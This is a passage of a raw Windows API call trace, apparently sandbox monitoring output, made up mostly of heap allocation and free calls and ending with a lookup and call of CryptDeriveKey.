(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0189.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0189.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0189.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0189.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0189.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b60 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.525] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0189.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0189.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0189.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.526] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0189.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509f8 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.526] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0189.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0189.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0189.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0189.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0189.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0189.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0189.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c38 [0189.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0189.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.531] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0189.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0189.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.532] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87410) returned 1 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0189.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0189.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.533] HeapFree (in: hHeap=0x970000, 